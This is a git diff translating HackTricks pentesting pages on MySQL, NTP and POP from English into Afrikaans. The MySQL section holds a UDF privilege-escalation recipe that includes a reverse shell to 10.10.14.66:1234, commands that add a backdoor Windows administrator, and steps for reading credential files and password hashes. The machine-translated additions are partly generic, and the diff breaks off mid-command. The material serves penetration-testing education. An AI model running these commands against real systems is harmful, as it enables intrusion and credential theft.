# Get a shell (with your permissions, usefull for sudo/suid privesc) \! sh ``` +### Voorregverhoging via biblioteek -### Privilege Escalation via library +As die **mysql-bediener as root** (of 'n ander meer bevoorregte gebruiker) loop, kan jy dit dwing om opdragte uit te voer. Hiervoor moet jy **gebruikersgedefinieerde funksies** gebruik. En om 'n gebruikersgedefinieerde funksie te skep, het jy 'n **biblioteek** nodig vir die bedryfstelsel waarop mysql loop. -If the **mysql server is running as root** (or a different more privileged user) you can make it execute commands. For that, you need to use **user defined functions**. And to create a user defined you will need a **library** for the OS that is running mysql. - -The malicious library to use can be found inside sqlmap and inside metasploit by doing **`locate "*lib_mysqludf_sys*"`**. The **`.so`** files are **linux** libraries and the **`.dll`** are the **Windows** ones, choose the one you need. - -If you **don't have** those libraries, you can either **look for them**, or download this [**linux C code**](https://www.exploit-db.com/exploits/1518) and **compile it inside the linux vulnerable machine**: +Die skadelike biblioteek wat gebruik moet word, kan binne sqlmap en binne metasploit gevind word deur **`locate "*lib_mysqludf_sys*"`** uit te voer. Die **`.so`** lêers is **Linux**-biblioteke en die **`.dll`** is die **Windows**-eenhede, kies die een wat jy benodig. +As jy **nie daardie biblioteke het nie**, kan jy dit óf **soek**, óf hierdie [**Linux C-kode**](https://www.exploit-db.com/exploits/1518) aflaai en **dit binne die kwesbare Linux-masjien kompileer**: ```bash gcc -g -c raptor_udf2.c gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc ``` - -Now that you have the library, login inside the Mysql as a privileged user (root?) and follow the next steps: +Nou dat jy die biblioteek het, teken binne in die Mysql as 'n bevoorregte gebruiker (root?) en volg die volgende stappe: #### Linux - ```sql # Use a database use mysql; @@ -250,9 +289,43 @@ create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt'); select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"'); ``` - #### Windows +##### MySQL Service Enumeration + +Om te begin, moet jy die MySQL-diens op die teikenstelsel identifiseer. Jy kan dit doen deur die volgende stappe te volg: + +1. Voer 'n skandering van die teikenstelsel uit om aktiewe poorte te identifiseer. +2. Kyk vir die poortnommer 3306, wat die standaardpoort vir MySQL is. +3. As die poort 3306 oop is, dui dit daarop dat die MySQL-diens op die stelsel loop. + +##### MySQL Service Exploitation + +As jy 'n MySQL-diens op die teikenstelsel geïdentifiseer het, kan jy probeer om dit te misbruik om toegang tot die stelsel te verkry. Hier is 'n paar moontlike aanvalstegnieke: + +1. **Brute force-aanval**: Probeer om in te log by die MySQL-diens deur verskillende gebruikersname en wagwoorde te probeer. +2. **SQL-injeksie**: Ondersoek die webtoepassings wat met die MySQL-diens gekoppel is, vir moontlike SQL-injeksiekwessies wat jy kan uitbuit om toegang te verkry. +3. **Gebruikersprivilege-uitbreiding**: As jy toegang het tot 'n beperkte gebruikerrekening, probeer om jou gebruikersprivileges uit te brei deur spesiale MySQL-opdragte uit te voer. +4. **Databasislek**: Ondersoek die databasis vir gevoelige inligting soos wagwoorde, kredietkaartinligting, ens. + +##### MySQL Service Post-Exploitation + +As jy toegang tot die MySQL-diens verkry het, kan jy verskeie post-exploitasietegnieke gebruik om verdere toegang tot die stelsel te verkry of om inligting te versamel: + +1. **Gebruikersrekeninguitbreiding**: Skep 'n nuwe gebruikerrekening met hoër privilegeniveaus om verdere toegang tot die stelsel te verkry. +2. **Databasisverkenning**: Ondersoek die databasis vir waardevolle inligting soos gebruikersname, wagwoorde, kredietkaartinligting, ens. +3. **Databasismanipulasie**: Verander of verwyder data in die databasis om die werking van die toepassing of die stelsel te beïnvloed. +4. **Databasisrugsteun**: Maak 'n rugsteunkopie van die databasis om belangrike inligting te bewaar of om dit later te gebruik. + +##### MySQL Service Hardening + +Om die veiligheid van die MySQL-diens te verhoog, kan jy die volgende maatreëls toepas: + +1. **Sterk wagwoorde**: Verseker dat alle gebruikersrekeninge sterk en unieke wagwoorde het. +2. **Beperkte gebruikersprivileges**: Gee slegs die nodige privilegies aan elke gebruikerrekening en beperk die toegang tot kritieke databasisfunksies. +3. **Bywerk van sagteware**: Verseker dat die MySQL-diens en alle verbonde sagteware op die jongste weergawes is om bekende kwessies en lekke te vermy. +4. **Netwerkbeperkings**: Beperk die toegang tot die MySQL-diens deur slegs spesifieke IP-adresse of subnette toe te laat. +5. **Logbestuur**: Monitor en analiseer die loglêers van die MySQL-diens vir enige verdagte aktiwiteite of pogings tot aanvalle. ```sql # CHech the linux comments for more indications USE mysql; @@ -264,56 +337,51 @@ CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll'; SELECT sys_exec("net user npn npn12345678 /add"); SELECT sys_exec("net localgroup Administrators npn /add"); ``` +### Uittreksel van MySQL-gelde van lêers -### Extracting MySQL credentials from files - -Inside _/etc/mysql/debian.cnf_ you can find the **plain-text password** of the user **debian-sys-maint** - +Binne _/etc/mysql/debian.cnf_ kan jy die **plain-tekswagwoord** van die gebruiker **debian-sys-maint** vind. ```bash cat /etc/mysql/debian.cnf ``` +Jy kan **hierdie geloofsbriewe gebruik om in die MySQL-databasis in te teken**. -You can **use these credentials to login in the mysql database**. - -Inside the file: _/var/lib/mysql/mysql/user.MYD_ you can find **all the hashes of the MySQL users** (the ones that you can extract from mysql.user inside the database)_._ - -You can extract them doing: +Binne die lêer: _/var/lib/mysql/mysql/user.MYD_ kan jy **al die hasings van die MySQL-gebruikers** vind (diegene wat jy kan onttrek uit mysql.user binne die databasis)_._ +Jy kan hulle onttrek deur die volgende te doen: ```bash grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password" ``` +### Aktivering van logging -### Enabling logging - -You can enable logging of mysql queries inside `/etc/mysql/my.cnf` uncommenting the following lines: +U kan die log van MySQL navrae aktiveer deur die volgende lyne in `/etc/mysql/my.cnf` te ontkommentarieer: ![](<../.gitbook/assets/image (277).png>) -### Useful files +### Nuttige lêers -Configuration Files +Konfigurasie-lêers * windows \* - * config.ini - * my.ini - * windows\my.ini - * winnt\my.ini - * \/mysql/data/ - * unix - * my.cnf - * /etc/my.cnf - * /etc/mysql/my.cnf - * /var/lib/mysql/my.cnf - * \~/.my.cnf - * /etc/my.cnf -* Command History - * \~/.mysql.history -* Log Files - * connections.log - * update.log - * common.log +* config.ini +* my.ini +* windows\my.ini +* winnt\my.ini +* \/mysql/data/ +* unix +* my.cnf +* /etc/my.cnf +* /etc/mysql/my.cnf +* /var/lib/mysql/my.cnf +* \~/.my.cnf +* /etc/my.cnf +* Opdraggeskiedenis +* \~/.mysql.history +* Log-lêers +* connections.log +* update.log +* common.log -## Default MySQL Database/Tables +## Standaard MySQL-databasis/tabelle {% tabs %} {% tab title="information_schema" %} @@ -545,18 +613,7 @@ io\_global\_by\_wait\_by\_bytes\ io\_global\_by\_wait\_by\_latency\ latest\_file\_io\ memory\_by\_host\_by\_current\_bytes\ -memory\_by\_thread\_by\_current\_bytes\ -memory\_by\_user\_by\_current\_bytes\ -memory\_global\_by\_current\_bytes\ -memory\_global\_total\ -metrics\ -processlist\ -ps\_check\_lost\_instrumentation\ -schema\_auto\_increment\_columns\ -schema\_index\_statistics\ -schema\_object\_overview\ -schema\_redundant\_indexes\ -schema\_table\_lock\_waits\ +memory\_by\_thread\_by\_current schema\_table\_statistics\ schema\_table\_statistics\_with\_buffer\ schema\_tables\_with\_full\_table\_scans\ @@ -630,60 +687,54 @@ x$wait\_classes\_global\_by\_latency\ x$waits\_by\_host\_by\_latency\ x$waits\_by\_user\_by\_latency\ x$waits\_global\_by\_latency -{% endtab %} -{% endtabs %} - -## HackTricks Automatic Commands +## HackTricks Outomatiese Opdragte ``` Protocol_Name: MySql #Protocol Abbreviation if there is one. Port_Number: 3306 #Comma separated if there is more than one. Protocol_Description: MySql #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for MySql - Note: | - MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL). +Name: Notes +Description: Notes for MySql +Note: | +MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL). - https://book.hacktricks.xyz/pentesting/pentesting-mysql +https://book.hacktricks.xyz/pentesting/pentesting-mysql Entry_2: - Name: Nmap - Description: Nmap with MySql Scripts - Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306 +Name: Nmap +Description: Nmap with MySql Scripts +Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306 Entry_3: - Name: MySql - Description: Attempt to connect to mysql server - Command: mysql -h {IP} -u {Username}@localhost - +Name: MySql +Description: Attempt to connect to mysql server +Command: mysql -h {IP} -u {Username}@localhost + Entry_4: - Name: MySql consolesless mfs enumeration - Description: MySql enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit' - +Name: MySql consolesless mfs enumeration +Description: MySql enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit' + ``` - -​ -
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteitsgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md index f1436113f..4d448a84a 100644 --- a/network-services-pentesting/pentesting-ntp.md +++ b/network-services-pentesting/pentesting-ntp.md @@ -2,54 +2,79 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Gaan in gesprek met inhoud wat die opwinding en uitdagings van hackery ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige hack-wêreld deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbountes wat bekendgestel word en kritieke platformopdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information +## Basiese Inligting -The **Network Time Protocol (NTP)** ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed. +Die **Network Time Protocol (NTP)** verseker dat rekenaars en netwerktoestelle oor veranderlike-latensie-netwerke hul horlosies akkuraat sinkroniseer. Dit is noodsaaklik vir die handhawing van presiese tydwaarneming in IT-bedrywighede, sekuriteit en logboekhouding. NTP se akkuraatheid is essensieel, maar dit stel ook sekuriteitsrisiko's in as dit nie behoorlik bestuur word nie. -### Summary & Security Tips: -- **Purpose**: Syncs device clocks over networks. -- **Importance**: Critical for security, logging, and operations. -- **Security Measures**: - - Use trusted NTP sources with authentication. - - Limit NTP server network access. - - Monitor synchronization for signs of tampering. - -**Default port:** 123/udp +### Opsomming & Sekuriteitswenke: +- **Doel**: Sinkroniseer toestelhorlosies oor netwerke. +- **Belangrikheid**: Krities vir sekuriteit, logboekhouding en bedrywighede. +- **Sekuriteitsmaatreëls**: +- Gebruik betroubare NTP-bronne met verifikasie. +- Beperk NTP-bedienernetwerktoegang. +- Monitor sinkronisasie vir tekens van manipulasie. +**Verstekpoort:** 123/udp ``` PORT STATE SERVICE REASON 123/udp open ntp udp-response ``` +## Opname -## Enumeration +### NTP (Network Time Protocol) +NTP (Network Time Protocol) is 'n protokol wat gebruik word om die korrekte tyd op 'n netwerk te sinkroniseer. Dit is 'n kritieke diens wat deur baie toepassings en stelsels gebruik word. Tydens 'n pentest kan die opname van NTP help om potensiële kwesbaarhede en aanvalsvektore te identifiseer. + +#### UDP-poort 123 + +NTP gebruik UDP-poort 123 vir kommunikasie. Dit is belangrik om te weet dat NTP 'n stateless protokol is, wat beteken dat elke versoek en antwoord as 'n afsonderlike transaksie hanteer word. + +#### NTP-klieënte + +Die eerste stap in die opname van NTP is om die NTP-klieënte op die teikenstelsel te identifiseer. Dit kan gedoen word deur die UDP-poort 123 te skandeer en te kyk vir aktiewe kliënte wat met die NTP-diens kommunikeer. + +#### NTP-bedieners + +Die volgende stap is om die NTP-bedieners op die teikenstelsel te identifiseer. Dit kan gedoen word deur die UDP-poort 123 te skandeer en te kyk vir aktiewe bedieners wat NTP-verkeer ontvang. + +#### NTP-bedieners se konfigurasie + +Die konfigurasie van die NTP-bedieners kan ook nuttige inligting verskaf. Dit kan gedoen word deur die bedieners se konfigurasiebestande te ondersoek. Hierdie bestande bevat dikwels inligting oor die bedieners se vertroude bron van tyd, toegestane kliënte en ander relevante instellings. + +#### NTP-verkeer analiseer + +Die analise van NTP-verkeer kan ook waardevolle inligting verskaf. Dit kan gedoen word deur die NTP-verkeer te onderskep en te ontleed. Hierdie analise kan help om potensiële kwesbaarhede, aanvalsvektore en selfs tydmanipulasie te identifiseer. + +#### NTP-aanvalle + +Laastens kan die opname van NTP ook help om potensiële aanvalsvektore te identifiseer. Daar is verskeie aanvalstegnieke wat gebruik kan word teen NTP, soos NTP-versterkingsaanvalle en NTP-man-in-die-middel-aanvalle. Die identifisering van hierdie aanvalsvektore kan help om die teikenstelsel te versterk en te beskerm teen moontlike aanvalle. ```bash ntpq -c readlist ntpq -c readvar @@ -63,76 +88,68 @@ ntpdc -c sysinfo ```bash nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 ``` - -## Examine configuration files +## Ondersoek konfigurasie lêers * ntp.conf -## NTP Amplification Attack +## NTP Amplifikasie Aanval -[**How NTP DDoS Attack Works**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref) - -The **NTP protocol**, using UDP, allows for operation without the need for handshake procedures, unlike TCP. This characteristic is exploited in **NTP DDoS amplification attacks**. Here, attackers create packets with a fake source IP, making it seem as if the attack requests come from the victim. These packets, initially small, prompt the NTP server to respond with much larger data volumes, amplifying the attack. - -The **_MONLIST_** command, despite its rare use, can report the last 600 clients connected to the NTP service. While the command itself is simple, its misuse in such attacks highlights critical security vulnerabilities. +[**Hoe NTP DDoS Aanval Werk**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref) +Die **NTP-protokol**, wat UDP gebruik, maak dit moontlik om te werk sonder die nodigheid van handskudprosedures, in teenstelling met TCP. Hierdie eienskap word uitgebuit in **NTP DDoS amplifikasie aanvalle**. Aanvallers skep pakkies met 'n vals bron-IP-adres, wat dit laat voorkom asof die aanvrae van die slagoffer afkomstig is. Hierdie pakkies, aanvanklik klein, lei die NTP-bediener om te reageer met veel groter data-volumes, wat die aanval versterk. +Die **_MONLIST_**-opdrag, ten spyte van sy seldsame gebruik, kan die laaste 600 kliënte wat aan die NTP-diens gekoppel is, rapporteer. Terwyl die opdrag self eenvoudig is, beklemtoon die misbruik daarvan in sulke aanvalle kritieke sekuriteitskwesbaarhede. ```bash ntpdc -n -c monlist ``` - ## Shodan * `ntp` -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: NTP #Protocol Abbreviation if there is one. Port_Number: 123 #Comma separated if there is more than one. Protocol_Description: Network Time Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for NTP - Note: | - The Network Time Protocol (NTP) ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed. +Name: Notes +Description: Notes for NTP +Note: | +The Network Time Protocol (NTP) ensures computers and network devices across variable-latency networks sync their clocks accurately. It's vital for maintaining precise timekeeping in IT operations, security, and logging. NTP's accuracy is essential, but it also poses security risks if not properly managed. - https://book.hacktricks.xyz/pentesting/pentesting-ntp +https://book.hacktricks.xyz/pentesting/pentesting-ntp Entry_2: - Name: Nmap - Description: Enumerate NTP - Command: nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 {IP} +Name: Nmap +Description: Enumerate NTP +Command: nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 {IP} ``` - -​ -
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/pentesting-pop.md b/network-services-pentesting/pentesting-pop.md index 0df834a30..28f672794 100644 --- a/network-services-pentesting/pentesting-pop.md +++ b/network-services-pentesting/pentesting-pop.md @@ -2,173 +2,223 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## Basic Information +## Basiese Inligting -**Post Office Protocol (POP)** is described as a protocol within the realm of computer networking and the Internet, which is utilized for the extraction and **retrieval of email from a remote mail server**, making it accessible on the local device. Positioned within the application layer of the OSI model, this protocol enables users to fetch and receive email. The operation of **POP clients** typically involves establishing a connection to the mail server, downloading all messages, storing these messages locally on the client system, and subsequently removing them from the server. Although there are three iterations of this protocol, **POP3** stands out as the most prevalently employed version. +**Post Office Protocol (POP)** word beskryf as 'n protokol binne die domein van rekenaarnetwerke en die internet, wat gebruik word vir die onttrekking en **herwinning van e-pos van 'n afgeleë posdiensbediener**, sodat dit toeganklik is op die plaaslike toestel. Geplaas binne die toepassingslaag van die OSI-model, maak hierdie protokol dit moontlik vir gebruikers om e-pos op te haal en te ontvang. Die werking van **POP-kliënte** behels tipies die vestiging van 'n verbinding met die posdiensbediener, aflaai van alle boodskappe, stoor van hierdie boodskappe lokaal op die kliëntstelsel, en dit daarna van die bediener verwyder. Alhoewel daar drie iterasies van hierdie protokol is, steek **POP3** uit as die mees algemeen gebruikte weergawe. -**Default ports:** 110, 995(ssl) - +**Verstekpoorte:** 110, 995(ssl) ``` PORT STATE SERVICE 110/tcp open pop3 ``` +### Banner Gaping -## Enumeration +Banner Gaping is 'n tegniek wat gebruik word om inligting oor 'n POP-diens te verkry deur die banner te ondersoek wat deur die diens teruggestuur word. Dit kan gedoen word deur 'n eenvoudige TCP-verbinding na die POP-diens te maak en die banner te lees wat deur die diens teruggestuur word. Die banner bevat dikwels nuttige inligting soos die diens se weergawe en die gebruikte sagteware. -### Banner Grabbing +Om banner gaping uit te voer, kan jy 'n hulpmiddel soos `telnet` gebruik om 'n TCP-verbinding na die POP-diens te maak en die banner te lees wat deur die diens teruggestuur word. Byvoorbeeld: +```plaintext +telnet 110 +``` + +Nadat jy die verbinding gemaak het, sal jy die banner sien wat deur die POP-diens teruggestuur word. Hierdie banner kan nuttige inligting verskaf wat jy kan gebruik om verdere aanvalle uit te voer of om die POP-diens te identifiseer. ```bash nc -nv 110 openssl s_client -connect :995 -crlf -quiet ``` +## Handleiding -## Manual - -You can use the command `CAPA` to obtain the capabilities of the POP3 server. - -## Automated +Jy kan die opdrag `CAPA` gebruik om die vermoëns van die POP3-bediener te verkry. +## Geoutomatiseerd ```bash nmap --script 